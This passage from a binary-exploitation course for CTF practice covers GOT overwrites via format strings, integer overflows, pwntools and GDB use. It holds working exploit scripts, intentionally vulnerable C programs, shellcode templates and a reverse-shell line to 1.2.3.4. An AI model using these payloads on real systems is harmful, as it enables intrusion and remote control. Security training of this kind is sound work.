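Lazy binding is easy to mimic with a dictionary. The model below is a deliberate simplification: the libc addresses are hypothetical, and the class `ToyProcess` is invented for illustration. It shows the two properties the attack relies on, namely that a GOT entry is filled on first call and that later calls trust whatever the entry contains.

```python
LIBC = {"puts": 0x7ffff7c80e50, "system": 0x7ffff7c50d70}   # hypothetical addresses


class ToyProcess:
    """Minimal model of PLT/GOT lazy binding."""

    def __init__(self):
        self.got = {}            # empty means "not resolved yet"
        self.resolutions = 0

    def _resolve(self, name):
        """Stand-in for the dynamic linker's symbol lookup."""
        self.resolutions += 1
        return LIBC[name]

    def call_via_plt(self, name):
        """Return the address a call through name@plt would jump to."""
        if name not in self.got:
            self.got[name] = self._resolve(name)   # first call: resolve and cache
        return self.got[name]                      # later calls: jump through the GOT


proc = ToyProcess()
first = proc.call_via_plt("puts")
second = proc.call_via_plt("puts")
print(first == second, proc.resolutions)           # True 1

proc.got["puts"] = LIBC["system"]                  # the attacker's GOT overwrite
print(proc.call_via_plt("puts") == LIBC["system"]) # True
```

Nothing re-checks the cached pointer after the first resolution, which is exactly the gap a GOT overwrite uses.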
The Plan
- Find a format string vuln that runs before a libc function call.
- Overwrite that function's GOT entry with the address of system.
- The next call jumps to system instead.
- If we control the original arg (e.g. printf(user_input) calls puts(user_input) downstream), we now call system(user_input) = RCE.
The Vulnerable Program
#include <stdio.h>
int main() {
char buf[200];
while (1) { // loop: the exploit needs three inputs (leak, overwrite, command)
printf("> ");
if (!fgets(buf, sizeof(buf), stdin)) break;
printf(buf); // fmt str vuln
puts(buf); // will be hijacked
}
return 0;
}
gcc -fno-stack-protector -no-pie -o fmt_got fmt_got.c
Step 1: Find the Format String Offset
$ ./fmt_got
> AAAAAAAA %6$lx
AAAAAAAA 4141414141414141 # input is at offset 6
Step 2: Leak libc Base
>>> payload = b"%6$lx" # whatever leaks libc, depends on stack contents
# Or read a resolved GOT entry directly with %s. The format goes first (argument 6), the address after it (argument 7).
# printf has already run once for the prompt, so its GOT entry holds a libc address; puts is not resolved until its first call.
>>> payload = b"%7$s".ljust(8, b"A") + p64(exe.got["printf"])
Step 3: Compute system's Address
libc.address = printf_leak - libc.symbols["printf"]
system_addr = libc.symbols["system"]
Step 4: Overwrite puts@got with system
payload = fmtstr_payload(6, {exe.got["puts"]: system_addr})
p.sendline(payload)
Now the next puts(buf) in main becomes system(buf). We need buf to contain a shell command. Re-trigger the loop with input "/bin/sh" if there's a loop, or just on the next read.
Putting It All Together
from pwn import *
context.binary = exe = ELF("./fmt_got") # sets 64-bit mode so fmtstr_payload packs 8-byte addresses
libc = exe.libc
p = process(exe.path)
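# Stage 1: leak a resolved GOT entry. printf has already been called for the prompt,
# so printf@got holds its libc address (puts@got is still unresolved at this point).
payload = b"|%7$s|".ljust(8, b"A") # format first: fills argument 6
payload += p64(exe.got["printf"]) # address lands in argument 7, after the specifiers
p.sendlineafter(b"> ", payload)
p.recvuntil(b"|")
leak = p.recvuntil(b"|", drop=True)
printf_libc = u64(leak.ljust(8, b"\x00"))
log.success(f"printf in libc: {hex(printf_libc)}")
libc.address = printf_libc - libc.symbols["printf"]
system_addr = libc.symbols["system"]
log.success(f"libc base: {hex(libc.address)}")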
# Stage 2: overwrite puts@got with system
payload = fmtstr_payload(6, {exe.got["puts"]: system_addr})
p.sendlineafter(b"> ", payload)
# Stage 3: feed "/bin/sh" — puts(buf) is now system(buf)
p.sendlineafter(b"> ", b"/bin/sh")
p.interactive()
RELRO Caveat
This entire technique only works if RELRO is NOT Full. With Full RELRO, the GOT is read-only and you'll segfault trying to write to it.
| RELRO level | GOT writable? | This attack works? |
|---|---|---|
| No RELRO | Always | Yes |
| Partial RELRO | Yes (.got.plt stays writable) | Yes |
| Full RELRO | Never | No — find a different write target |
9 // Integer Overflows
Not always a direct memory corruption, but often the cause of one. An integer overflow wraps a value around (a negative int becomes a huge unsigned number, a large product wraps to something small), bypassing size checks and triggering buffer overflows or undersized allocations downstream.
The Three Classic Bugs
Signed-to-Unsigned Conversion
void handle(int size, char *src) {
char buf[100];
if (size > 100) return; // signed compare
memcpy(buf, src, size); // size is implicitly cast to size_t (unsigned)
}
If the user passes size = -1, the check passes (-1 ≤ 100), but memcpy sees (size_t)0xFFFFFFFFFFFFFFFF and tries to copy 16 exabytes. Boom.
Fix: use size_t everywhere, or check for size >= 0 && size <= 100.
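Python integers do not wrap, so the conversion has to be modelled with an explicit mask. The sketch below assumes a 64-bit size_t; the function names are made up for illustration. It shows why the signed check passes while the copy length explodes, and how the range check closes the gap.

```python
SIZE_T_MASK = (1 << 64) - 1          # assumes a 64-bit size_t


def as_size_t(n):
    """What an int looks like after implicit conversion to size_t."""
    return n & SIZE_T_MASK


def buggy_check(size):
    """Mirror of `if (size > 100) return;` where True means the copy proceeds."""
    return not (size > 100)


def fixed_check(size):
    """Mirror of `size >= 0 && size <= 100`."""
    return 0 <= size <= 100


size = -1
print(buggy_check(size))       # True
print(hex(as_size_t(size)))    # 0xffffffffffffffff
print(fixed_check(size))       # False
```

The bug is the mismatch between the type used for the check and the type used for the copy, not the value itself.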
Multiplication Overflow in malloc
void alloc(size_t n) {
char *buf = malloc(n * 8);
for (int i = 0; i < n; i++) buf[i*8] = ...;
}
If n = 0x2000000000000001 on 64-bit, then n * 8 overflows to 8. malloc returns an 8-byte buffer. The loop writes to buf[0], buf[8], ... way past the end.
Fix: use calloc(n, 8) which checks for overflow.
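The wraparound and the overflow check can both be reproduced with modular arithmetic. This sketch assumes a 64-bit size_t. `checked_mul` is a hypothetical helper showing the kind of test an overflow-aware allocator performs, not the actual code of any libc.

```python
SIZE_T_MAX = (1 << 64) - 1           # assumes a 64-bit size_t


def wrapped_mul(n, elem_size):
    """n * elem_size as unsigned 64-bit arithmetic would compute it."""
    return (n * elem_size) & SIZE_T_MAX


def checked_mul(n, elem_size):
    """Refuse the multiplication if the true product does not fit in size_t."""
    if elem_size and n > SIZE_T_MAX // elem_size:
        raise OverflowError("n * elem_size overflows size_t")
    return n * elem_size


n = 0x2000000000000001
print(wrapped_mul(n, 8))             # 8
print(checked_mul(16, 8))            # 128
try:
    checked_mul(n, 8)
except OverflowError as exc:
    print("rejected:", exc)          # rejected: n * elem_size overflows size_t
```

The division-based test avoids computing the overflowing product at all, which is the standard way to write this check in C as well.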
Off-By-One via INT_MAX
int count = get_user_input();
int total = count + 1; // if count == INT_MAX, total wraps to INT_MIN
char *buf = malloc(total);
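for (int i = 0; i < count; i++) buf[i] = 0;
malloc(INT_MIN) converts the negative total to an enormous size_t, so it will normally fail and return NULL, which this code never checks. The loop still runs INT_MAX times, writing through whatever pointer came back.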
How They Get Exploited
Integer bugs rarely give you direct RIP control. They give you a secondary primitive:
| Bug | Primitive |
|---|---|
| Signed→unsigned in memcpy size | Stack/heap buffer overflow |
| Multiplication overflow in malloc | Heap buffer overflow |
| Underflow in idx for array access | Negative-index OOB write |
| Wrap in length field of network packet | Read past buffer → info leak |
Then chain to whatever your secondary primitive enables. An integer bug isn't usually the exploit — it's the door to the exploit.
Worked Example
#include <stdio.h>
#include <string.h>
void store(int len) {
char buf[100];
if (len > 100) {
printf("Too long.\n");
return;
}
printf("Send %d bytes: ", len);
fread(buf, 1, len, stdin); // len is cast to size_t!
}
int main() {
int n;
scanf("%d", &n);
store(n);
}
Send -1 as n:
- Check len > 100 → false (since -1 < 100).
- fread(buf, 1, -1, stdin) → fread sees a count of 0xFFFFFFFFFFFFFFFF, reads until EOF or buffer fills.
- You overflow buf[100] with as much as you want.
Now it's a regular stack overflow. ROP from here.
Where to Hunt for These
- Length parameters in network protocols (TCP, custom binary protocols).
- File offsets and sizes in parsers (PDFs, images, archives).
- Anywhere user input feeds into malloc, memcpy, fread, recv, or array indexing.
- Functions that accept int for sizes (instead of size_t).
10 // Pwntools Mastery
You've been using pwntools throughout this course. Now learn to use it like a pro. The difference between someone who can pwn and someone who solves CTFs fast is fluency in this library.
The Universal Template
Start every exploit from this. Edit the variables, leave the structure.
#!/usr/bin/env python3
from pwn import *
# --- target -----
exe = ELF("./vuln")
libc = exe.libc # auto-detected
context.binary = exe
context.terminal = ["tmux", "splitw", "-h"] # for gdb.attach
HOST, PORT = "chal.ctf.io", 31337
# --- launcher -----
def conn():
    if args.REMOTE:
        return remote(HOST, PORT)
    if args.GDB:
        return gdb.debug(exe.path, gdbscript=GDB_SCRIPT)
    return process(exe.path)
GDB_SCRIPT = """
break *vuln+50
continue
"""
# --- exploit -----
p = conn()
offset = 72
payload = b"A" * offset
payload += p64(0xdeadbeef)
p.sendlineafter(b"> ", payload)
p.interactive()
Run it three different ways without changing the script:
python3 solve.py # local process
python3 solve.py REMOTE # connect to remote server
python3 solve.py GDB # launch with gdb attached
Process Connections
| Function | Use |
|---|---|
| process("./vuln") | Run a local binary |
| remote("host", port) | Connect over TCP |
| ssh(user, host, password=...) | SSH session |
| gdb.debug(path, gdbscript) | Launch with GDB attached, run gdbscript first |
| gdb.attach(p, gdbscript) | Attach to existing process |
I/O Cheat Sheet
This is where 90% of beginners get stuck. Get fluent with these:
| Method | What it does |
|---|---|
| p.send(data) | Send bytes (no newline) |
| p.sendline(data) | Send bytes + \n |
| p.recv(n) | Read up to n bytes |
| p.recvline() | Read one line (incl newline) |
| p.recvuntil(delim) | Read until delim is seen — most reliable |
| p.recvall() | Read until EOF |
| p.sendlineafter(delim, data) | recvuntil(delim) then sendline(data) — cleanest |
| p.sendafter(delim, data) | recvuntil(delim) then send(data) |
| p.interactive() | Hand control to the user — for getting your shell |
| p.close() | Close the connection |
Pack/Unpack Helpers
p64(0xdeadbeef) # → b'\xef\xbe\xad\xde\x00\x00\x00\x00'
p32(0x12345678) # → b'\x78\x56\x34\x12'
p16(0xabcd) # → b'\xcd\xab'
p8(0x41) # → b'A'
u64(b"\xef\xbe\xad\xde...") # → 0xdeadbeef
u64(leak.ljust(8, b"\x00")) # pad short leaks before unpacking
ELF and Symbol Resolution
e = ELF("./vuln")
e.symbols["main"] # 0x401136 (function in binary)
e.plt["puts"] # 0x401030 (PLT stub)
e.got["puts"] # 0x404018 (GOT entry)
e.bss() # 0x404060 (start of bss)
e.bss(0x100) # bss + offset
next(e.search(b"/bin/sh")) # find string in binary
e.address = 0x55a3d8000000 # set base; symbols update automatically
ROP Object
rop = ROP(exe)
# Method-style: call any imported function
rop.puts(0xdeadbeef)
rop.system(0x404060)
rop.execve(0, 0, 0)
# Raw: append a gadget address
rop.raw(0x40101a) # single ret for alignment
# Find specific gadget
rop.find_gadget(["pop rdi", "ret"])
print(rop.dump()) # pretty-print
chain = rop.chain() # bytes ready to use
Shellcode Generation
context.arch = "amd64" # or 'i386' for 32-bit
asm(shellcraft.sh()) # /bin/sh shellcode
asm(shellcraft.cat("flag.txt")) # cat a file
asm(shellcraft.dupsh()) # dup stdin/stdout, then sh
asm(shellcraft.connect("1.2.3.4", 9001)) # reverse shell setup
# Custom assembly
asm("mov rdi, 0xdeadbeef; ret")
Format String Builder
# Write multiple values in one shot
fmtstr_payload(offset=6, writes={
    0x404020: 0xdeadbeef,
    exe.got["puts"]: libc.symbols["system"]
})
Cyclic Patterns
cyclic(200) # generate
cyclic_find(0x6161617461616173) # lookup → 72 (only the low 4 bytes, "saaa", are used)
cyclic_find(b"saaa") # or by 4-byte chunk
Logging
log.info("libc base: %s", hex(libc.address))
log.success("Got shell!")
log.warning("Canary might be wrong")
log.failure("Crashed")
log.error("Aborting") # raises exception
Useful Context Settings
context.arch = "amd64" # or i386, arm, aarch64, mips
context.os = "linux"
context.endian = "little"
context.log_level = "debug" # debug | info | warning | error
# When you set context.binary, all of these are auto-set:
context.binary = ELF("./vuln")
The args Object
Pwntools captures any UPPER-CASE word from sys.argv as a flag in args:
$ python3 solve.py REMOTE DEBUG
# In script:
if args.REMOTE: ... # True
if args.DEBUG: ... # True
Use this to switch between local/remote/GDB without editing code.
11 // Debugging Workflow
You will spend more time in the debugger than writing exploits. The faster you can navigate GDB/pwndbg, the faster you ship. Here's the workflow that works.
Launch Modes
Mode 1: Standalone GDB
gdb -q ./vuln
pwndbg> break *vuln+50
pwndbg> run < payload.bin
pwndbg> run < <(python3 -c "print('A'*100)")
Use this to manually explore a binary without writing a script first.
Mode 2: gdb.debug() (pwntools launches GDB)
p = gdb.debug(exe.path, gdbscript="""
break *vuln+50
continue
""")
Pwntools opens a new terminal with GDB attached, runs your script, then drops into the breakpoint. Most ergonomic for iterative exploit development.
Mode 3: gdb.attach() (attach to a running process)
p = process(exe.path)
gdb.attach(p, "break *vuln+50")
p.sendline(b"AAAA")
Use when you want pwntools to drive the I/O but pause at a specific point to inspect.
The Pwndbg Cheatsheet
The commands you'll use 100 times a day:
| Command | What |
|---|---|
| vmmap | Show full memory map (where stack/heap/libc/binary live) |
| telescope $rsp | Pretty-print stack with type guesses |
| telescope $rsp 30 | ...show 30 entries |
| nearpc | Disassemble around RIP |
| got | Show GOT contents |
| plt | Show PLT contents |
| procinfo | Show PID, libs, ASLR state |
| checksec | Show binary protections |
| cyclic 200 | Generate de Bruijn pattern |
| cyclic -l $rip | Find offset of crash value |
| search "/bin/sh" | Search memory for a string |
| search -t pointer 0xdeadbeef | Find pointers to a value |
| rop --grep "pop rdi" | Find ROP gadgets in loaded modules |
| canary | Print canary value of current process |
| libc | Show loaded libc base |
The Standard GDB Verbs
| Command | Effect |
|---|---|
| r / run | Run program |
| c / continue | Resume |
| b *0x401234 | Breakpoint at address |
| b vuln | Breakpoint at function |
| b *vuln+50 | Breakpoint at offset within function |
| info b | List breakpoints |
| delete N | Delete breakpoint N |
| n / next | Step over (skip calls) |
| s / step | Step into |
| ni / si | Step over/into one instruction |
| finish | Run until current function returns |
| x/10gx $rsp | Examine 10 quadwords at RSP as hex |
| x/20i $rip | 20 instructions from RIP |
| x/s 0x402000 | Print string at address |
| p $rdi | Print register |
| set $rdi=0xdeadbeef | Set register |
The "x" Command Format
Reading x/10gx $rsp intimidates beginners. It's just x/<count><size><format> <address>:
| Size | Bytes |
|---|---|
| b | byte (1) |
| h | halfword (2) |
| w | word (4) |
| g | giant (8) ← what you want for x86-64 |
| Format | Meaning |
|---|---|
| x | hex |
| d | decimal |
| s | string |
| i | instruction |
| a | address (with symbol) |
So x/10gx $rsp = "10 giant hex starting at RSP". Memorize this combo for x86-64.
The Iteration Loop
Here's the rhythm of solving a real challenge:
- checksec the binary. Note the protections.
- Open in Ghidra. Find the vuln. Note the buffer sizes.
- Quick-test in GDB: r < <(cyclic 200). Confirm RIP control. cyclic -l $rip for offset.
- Write a minimal pwntools script with that offset and a known address.
- Run with GDB arg, breakpoint right before ret, telescope $rsp 5 to verify the chain looks right.
- Iterate.
- When local works, switch to REMOTE.
Common Debug Wins
Conditional Breakpoints & Watchpoints
# break only when rdi has a specific value
b *0x40118a if $rdi == 0x404020
# break when an address is written
watch *0x404020
# break when an address is read
rwatch *0x404020
Writing GDB Scripts
Save common debugging recipes:
define stk
telescope $rsp 20
end
define hook-stop
nearpc 5
telescope $rsp 10
end
Source it from ~/.gdbinit. Now stk shows your stack, and pressing n auto-displays disassembly + stack at every step.
12 // Where to Practice Next
You've finished the course. The only thing left is reps. Below are the resources I personally use and recommend, in roughly increasing difficulty. Don't skip the easy ones — speed on basics matters more than struggling with hard challenges.
Tier 1: Guided Beginner
pwn.college. Start here. Free university-grade course from Arizona State. Auto-graded modules, Discord, dojos for every topic in this course. The single best resource on the internet for binexp.
CryptoCat (YouTube). Detailed video walkthroughs of every classic pwn technique. Perfect companion to this course.
pwnable.kr. The OG pwn challenge site. Start with fd, collision, bof. Each one teaches a single concept clearly.
exploit.education. Phoenix & Protostar VMs. Boot the VM and work through 50+ progressively harder challenges with full source provided.
Tier 2: Topical Practice
ROP Emporium. 8 challenges that go from simple ret2win to complex multi-stage chains. Same binary in 32-bit and 64-bit so you learn both ABIs.
CryptoCat's CTF repo. Curated format string challenges with writeups.
how2heap. Shellphish's heap exploitation curriculum. Classic glibc bugs (House of Force, House of Spirit, etc.). For after this course.
pwnable.tw. Harder cousin of pwnable.kr. Modern challenges, most with full mitigations on.
Tier 3: CTFs (Live Practice)
- picoCTF — easiest entry. Year-round practice on past challenges.
- CTFtime.org — calendar of all upcoming CTFs. Filter by "pwn" tag.
- Hack The Box — pwn challenges + retired full machines with binexp components.
- Hacker101 — HackerOne's free CTF, runs continuously.
Tier 4: Reading List
📘 Hacking: The Art of Exploitation. Jon Erickson. The classic. Read the chapters on stack overflows, format strings, and ROP. Code examples included.
📘 The Shellcoder's Handbook. Older but still relevant for the fundamentals. Especially good on shellcode.
📗 Ir0nstone's Binary Exploitation Notes. Free online book. Covers everything from stack BOF through advanced heap. Most up-to-date free resource.
📗 Nightmare. Intro-to-binexp tutorial repo with 30+ worked CTF challenges, all source included. Best self-paced curriculum.
Tier 5: Beyond This Course
Once stack exploitation feels easy, here's what's next:
- Heap exploitation — UAF, double-free, tcache, fastbin, House of *. how2heap → pwn.college heap.
- Kernel pwn — kernel CTF challenges. Different rules, different bugs (SLUB, modprobe path, etc.).
- Browser exploitation — V8, JSC. Different game. Read browser-pwn.
- Sandbox escapes — seccomp, kctf-style sandboxes. Learn ORW (open/read/write) shellcode.
- Real CVE research — pick an OSS project, audit, file bugs. The honest endgame.
The Honest Truth About Improvement
The single biggest factor in getting better at pwn is solving challenges and reading other people's writeups for the same challenge after. Always. Every time.
Your first solution will be ugly. The top-tier writeups will use techniques you didn't think of. Steal them. Next time you'll see those patterns automatically.
Stay Connected
- CYB3RFY YouTube — CTF walkthroughs, including future binexp content.
- Reverse Engineering Course — the prerequisite course, if you skipped it.
- Discord/Twitter pwn community: search "infosec twitter pwn". Many researchers share writeups there regularly.
// Interactive Tools
Live tools you can play with right in the browser. No installation — just type, see results, build intuition.
1. Stack Layout Visualizer. Configure a vulnerable function and see exactly how the stack looks before and after the overflow. Adjust the buffer size and canary state, and watch the payload fill the stack. Inputs: buffer size (bytes), stack canary (yes/no), architecture (x86-64 with 8-byte slots, or x86 with 4-byte slots), and the target RIP address (hex).
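If you are reading this offline, the same picture can be approximated in a few lines of Python. This is a minimal sketch of a simplified frame model (buffer, optional canary, saved frame pointer, return address); the function names are made up for illustration, and a real compiler may add padding or extra saved registers, so always confirm the offsets in a debugger.

```python
def stack_layout(buf_size, has_canary, word=8):
    """Return (offset_from_buffer_start, size, label) per slot, low to high address.

    Simplified model: assumes no compiler padding between the slots.
    """
    slots = [(0, buf_size, "buffer")]
    offset = buf_size
    if has_canary:
        slots.append((offset, word, "stack canary"))
        offset += word
    slots.append((offset, word, "saved frame pointer"))
    offset += word
    slots.append((offset, word, "return address"))
    return slots


def return_address_offset(buf_size, has_canary, word=8):
    """Bytes of input needed before the return address is reached (same model)."""
    return stack_layout(buf_size, has_canary, word)[-1][0]


if __name__ == "__main__":
    for off, size, label in stack_layout(128, has_canary=True):
        print(f"+{off:<4} {size:>4} bytes  {label}")
```

Pass word=4 to model 32-bit x86.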
2. Payload Builder. Construct a pwntools payload by configuring its components. The tool generates the Python code and the byte sequence. Inputs: padding size (bytes), padding character, architecture (x86-64 using p64, or x86 using p32), and a ROP chain with one hex address per line (sample chain: 0x401333, 0x402008, 0x40101a, 0x401040).
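What the builder produces boils down to padding followed by little-endian addresses. Here is a sketch using only the standard library, where struct.pack("<Q", ...) stands in for pwntools' p64 and "<I" for p32. The chain is the tool's sample chain; the padding size of 136 is an assumed value, not one measured from a real binary.

```python
import struct


def build_payload(pad_size, chain, bits=64, pad_byte=b"A"):
    """Padding followed by each chain address packed little-endian."""
    fmt = "<Q" if bits == 64 else "<I"  # 8-byte or 4-byte slots
    payload = pad_byte * pad_size
    for addr in chain:
        payload += struct.pack(fmt, addr)
    return payload


# Sample chain from the tool; 136 is a hypothetical offset.
chain = [0x401333, 0x402008, 0x40101A, 0x401040]
payload = build_payload(136, chain)

if __name__ == "__main__":
    print(len(payload), "bytes")
    print(payload[136:].hex())
```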
3. Cyclic Pattern Generator. Generate a de Bruijn pattern, then look up the offset of any 4- or 8-byte value found in your crashed RIP. Inputs: pattern length for generation; for lookup, the hex value from the crash and the chunk size (8 bytes for x86-64 RIP, 4 bytes for x86 EIP).
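The idea behind the generator fits in a short script: in a de Bruijn sequence every n-byte window appears only once, so a window's position is its offset. The sketch below uses the standard recursive construction over a lowercase alphabet with n = 4. The function names mirror pwntools' cyclic and cyclic_find for familiarity, but this is an illustrative reimplementation, not the library code.

```python
import itertools
import string

ALPHABET = string.ascii_lowercase.encode()


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the bytes of a de Bruijn sequence over `alphabet` with window size n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern."""
    return bytes(itertools.islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(value, length=10000, n=4):
    """Offset of the first n bytes of `value` in the pattern, or -1 if absent."""
    return cyclic(length, n).find(value[:n])


if __name__ == "__main__":
    pattern = cyclic(200)
    print(pattern[:16])
    print(cyclic_find(pattern[136:144]))
```

If your debugger shows the crashed value as a hex integer, convert it to bytes in little-endian order first, for example with struct.pack("<I", value), before looking it up.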
4. Checksec Output Explainer. Paste raw checksec output and get a plain-English breakdown of what's enabled and what your exploitation strategy should be. Sample input: the columns RELRO, STACK CANARY, NX, PIE with the values Full RELRO, Canary found, NX enabled, PIE enabled.
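A rough offline equivalent is a keyword scan over the pasted text. This sketch assumes the usual checksec phrases ("Full RELRO", "Canary found", "No canary found", "NX enabled", "PIE enabled"). The function names and the strategy notes are illustrative simplifications, not a complete decision procedure.

```python
def explain_checksec(text):
    """Extract mitigation flags from pasted checksec output (keyword match only)."""
    lower = text.lower()
    if "full relro" in lower:
        relro = "full"
    elif "partial relro" in lower:
        relro = "partial"
    else:
        relro = "none"
    return {
        "relro": relro,
        # "no canary found" also contains "canary found", so exclude it explicitly.
        "canary": "canary found" in lower and "no canary found" not in lower,
        "nx": "nx enabled" in lower,
        "pie": "pie enabled" in lower,
    }


def strategy(flags):
    """One plain-English note per mitigation."""
    return [
        "leak the canary before overflowing past it" if flags["canary"]
        else "a plain overflow can reach the return address",
        "stack is non-executable: use ret2win, ROP or ret2libc" if flags["nx"]
        else "shellcode on the stack is an option",
        "code addresses are randomized: leak a code pointer first" if flags["pie"]
        else "code addresses are fixed: gadgets and PLT entries can be hard-coded",
        "GOT is read-only: no GOT overwrite" if flags["relro"] == "full"
        else "GOT is writable: a GOT overwrite may be possible",
    ]


if __name__ == "__main__":
    sample = "Full RELRO  Canary found  NX enabled  PIE enabled"
    for note in strategy(explain_checksec(sample)):
        print("-", note)
```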
5. Quick Shellcode Reference. Common shellcode payloads, ready to copy. All x86-64 Linux, null-byte-free. Available payloads: execve("/bin/sh", 0, 0) (27 bytes), cat /flag.txt (read+write loop), exit(0) (7 bytes), and a reverse shell stub.
// Practice Challenges
Five challenges that mirror the chapters. Try them in order. Each one targets one specific technique. Source code & build flags shown so you can compile and try locally.
Challenge 01 — Find the Offset
Goal: Find the offset to RIP using cyclic. Confirm RIP control. No win function — you're just learning to find offsets.
// chal01.c
#include <stdio.h>
void v(){char b[128];gets(b);}
int main(){v();return 0;}
# Build:
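gcc -fno-stack-protector -no-pie -o chal01 chal01.c
Hint: Generate a pattern with cyclic 200, run the program inside GDB, and feed it the pattern. On x86-64 the ret faults before a non-canonical address is loaded into RIP, so read the value at the top of the stack (x/gx $rsp) and pass its low 4 bytes to cyclic -l.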
Challenge 02 — Ret2Win (No Mitigations)
Goal: Hijack RIP to call win(). Use the offset from Challenge 01.
// chal02.c
#include <stdio.h>
#include <stdlib.h>
void win(){system("/bin/sh");}
void v(){char b[128];gets(b);}
int main(){v();return 0;}
gcc -fno-stack-protector -no-pie -o chal02 chal02.c
Watch out: win() calls system(), so you may need an extra ret gadget before win() to keep the stack 16-byte aligned.
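The payload shape for this challenge, with and without the alignment gadget, can be sketched as follows. The offset and both addresses are hypothetical placeholders; take the real ones from your own build (for example with cyclic and objdump). struct.pack("<Q", ...) plays the role of pwntools' p64.

```python
import struct


def ret2win_payload(offset, win_addr, ret_gadget=None):
    """[padding][optional ret gadget][win]; the lone ret shifts RSP by 8 bytes."""
    payload = b"A" * offset
    if ret_gadget is not None:
        payload += struct.pack("<Q", ret_gadget)
    payload += struct.pack("<Q", win_addr)
    return payload


# Hypothetical values, not taken from a real chal02 binary.
OFFSET = 136
WIN = 0x401156
RET = 0x40101A

plain = ret2win_payload(OFFSET, WIN)
aligned = ret2win_payload(OFFSET, WIN, ret_gadget=RET)

if __name__ == "__main__":
    print(len(plain), len(aligned))
```

Try the plain payload first; if the process crashes inside system() on a movaps instruction, switch to the aligned one.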
Challenge 03 — 32-bit Ret2libc
Goal: No win() function. Call system("/bin/sh") using libc. ASLR off, 32-bit.
// chal03.c — 32-bit
#include <stdio.h>
void v(){char b[100];gets(b);}
int main(){v();return 0;}
gcc -m32 -fno-stack-protector -no-pie -o chal03 chal03.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Hint: 32-bit calling convention puts args on the stack. Payload shape: [ pad ][ &system ][ fake_ret ][ &"/bin/sh" ]. Find system and "/bin/sh" in libc.
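The payload shape from the hint translates directly into 4-byte little-endian words. In this sketch every number is a hypothetical placeholder: measure the offset with cyclic, and read the system and "/bin/sh" addresses from the libc your process actually loads.

```python
import struct


def ret2libc32(offset, system_addr, binsh_addr, fake_ret=0xDEADBEEF):
    """[pad][&system][fake_ret][&"/bin/sh"] for the 32-bit cdecl convention.

    system() sees fake_ret as its return address and binsh_addr as its first argument.
    """
    return b"A" * offset + struct.pack("<III", system_addr, fake_ret, binsh_addr)


# Hypothetical values for illustration only.
payload = ret2libc32(offset=112, system_addr=0xF7E0C360, binsh_addr=0xF7F4E363)

if __name__ == "__main__":
    print(payload[112:].hex())
```

The process will crash at fake_ret once the shell exits; replace it with the address of exit() if you want a clean return.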
Challenge 04 — Canary Bypass via Format String
Goal: Two stages. Use the format-string bug to leak the canary. Then overflow the buffer, writing the leaked canary back in place, and overwrite the saved return address with win().
// chal04.c
#include <stdio.h>
#include <stdlib.h>
void win(){system("/bin/sh");}
void v(){
char name[64];
printf("name? "); fgets(name, 64, stdin);
printf(name); // fmt str leak
char b[128];
printf("input? "); gets(b); // BOF
}
int main(){v();return 0;}
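gcc -no-pie -fstack-protector-strong -o chal04 chal04.c # forces the canary on; many distros enable it by default
Hint: Find the format string offset of the canary first using %N$lx. Printed in hex, the canary always ends in 00, because its lowest byte is a null.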
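Both stages reduce to a little byte handling: parse the hex the program prints back, then rebuild the frame with the canary in place. A minimal sketch follows. The helper names are made up, and the sample leak, the canary offset of 136 and the win() address are all hypothetical, so measure the real values in GDB.

```python
import struct


def parse_canary(leak_line):
    """Turn the %N$lx output (hex text) into an integer and sanity-check it."""
    canary = int(leak_line.strip(), 16)
    if canary & 0xFF != 0:
        raise ValueError("low byte is not 00; probably the wrong format offset")
    return canary


def canary_payload(canary_offset, canary, ret_addr, saved_rbp=0x4242424242424242):
    """[pad up to canary][canary][saved RBP filler][new return address]."""
    return b"A" * canary_offset + struct.pack("<QQQ", canary, saved_rbp, ret_addr)


# Hypothetical leak and addresses for illustration only.
canary = parse_canary(b"a1b2c3d4e5f60700\n")
payload = canary_payload(canary_offset=136, canary=canary, ret_addr=0x401176)

if __name__ == "__main__":
    print(hex(canary))
    print(payload[136:].hex())
```

As in Challenge 02, an extra ret gadget before win() may be needed for stack alignment.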
Challenge 05 — Full ROP with libc Leak
Goal: NX and ASLR on; canary and PIE off (see the build flags). Two-stage exploit: leak libc via puts(puts@got), then ret2system.
// chal05.c
#include <stdio.h>
void v(){char b[128];gets(b);}
int main(){while(1)v();return 0;}
gcc -fno-stack-protector -no-pie -o chal05 chal05.c
# ASLR ON for this one (default):
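echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Hint: Stage 1 chain: pop rdi → puts@got → puts@plt → main. puts stops at the first null byte, so you will usually read back 6 bytes rather than 8; pad them to 8 with nulls, unpack, and subtract libc.symbols['puts'] to get the libc base. Stage 2: ROP to system("/bin/sh").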
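The arithmetic between the two stages is where most first attempts go wrong, so here it is in isolation. This sketch uses only the standard library, with struct standing in for pwntools' p64/u64. Every address and offset is a hypothetical placeholder; the real puts offset comes from the libc on the target.

```python
import struct


def stage1_chain(offset, pop_rdi, puts_got, puts_plt, main_addr):
    """[pad][pop rdi; ret][puts@got][puts@plt][main]: print puts' address, then restart."""
    return b"A" * offset + struct.pack("<QQQQ", pop_rdi, puts_got, puts_plt, main_addr)


def libc_base_from_leak(leaked, puts_offset):
    """Convert the bytes printed by puts(puts@got) into the libc base address."""
    if leaked.endswith(b"\n"):
        leaked = leaked[:-1]  # drop only the newline that puts appends
    raw = leaked[:8].ljust(8, b"\x00")  # leak is usually 6 bytes; pad to 8
    puts_addr = struct.unpack("<Q", raw)[0]
    base = puts_addr - puts_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned; wrong libc or bad leak")
    return base


# Hypothetical leak: puts at 0x7f1234580e50 with an assumed offset of 0x80e50.
leak = struct.pack("<Q", 0x7F1234580E50)[:6] + b"\n"
base = libc_base_from_leak(leak, puts_offset=0x80E50)

if __name__ == "__main__":
    print(hex(base))
```

A base that does not end in 000 almost always means the wrong libc version or a misread leak, which is why the function refuses to return one.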